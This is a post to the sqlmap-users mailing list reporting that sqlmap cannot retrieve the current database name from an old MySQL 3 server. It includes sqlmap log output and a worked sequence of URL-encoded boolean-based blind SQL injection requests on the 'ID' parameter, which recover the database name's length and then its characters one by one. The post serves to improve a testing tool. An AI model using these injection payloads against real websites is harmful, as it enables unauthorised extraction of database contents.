>From this DBMS (MySql 3) SqlMap don't retireve the name of 'Current DB'
[13:38:33] [INFO] resuming back-end DBMS 'mysql 3' from session file
[13:38:33] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
reque
sts:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=26 AND 1443=1443
---
[13:38:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat 7.2 or 7.3 or 7.1 (Seawolf or
Enigma
or Valhalla)
web application technology: PHP 4.4.2, Apache 1.3.27
back-end DBMS: MySQL 3
[13:38:38] [WARNING] information_schema not available, back-end DBMS is
MySQL <
5. database names will be fetched from 'mysql' database
[13:38:38] [INFO] fetching number of databases
[13:38:38] [WARNING] running in a single-thread mode. Please consider usage
of o
ption '--threads' for faster data retrieval
[13:38:38] [INFO] retrieved:
[13:38:57] [ERROR] unable to retrieve the number of databases
[13:38:57] [INFO] falling back to current database
[13:38:57] [INFO] fetching current database
[13:38:57] [INFO] retrieved:
[13:39:41] [CRITICAL] unable to retrieve the database names
This is the correct sequence to implement:
Get length of database (Length of 'Current DB' is 3)
?ID=26+and+Length%28%28database%28%29%29%29%3C32
?ID=26+and+Length%28%28database%28%29%29%29%3C16
?ID=26+and+Length%28%28database%28%29%29%29%3C8
?ID=26+and+Length%28%28database%28%29%29%29%3C4
?ID=26+and+Length%28%28database%28%29%29%29%3D3
Try to get the name of database (Name of 'Current DB' is die)
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C79
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C103
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C91
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C97
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3C100
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D102
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D101
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C1%2C1%29%29%3D100
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C79
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C103
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C115
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C109
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3C106
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C2%2C1%29%29%3D105
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C79
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C103
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C91
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C97
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3C100
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D102
?ID=26+and+ascii%28substring%28%28database%28%29%29%2C3%2C1%29%29%3D101
Best regards
------------------------------------------------------------------------------
This SF email is sponsosred by:
Try Windows Azure free for 90 days Click Here
http://p.sf.net/sfu/sfd2d-msazure
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
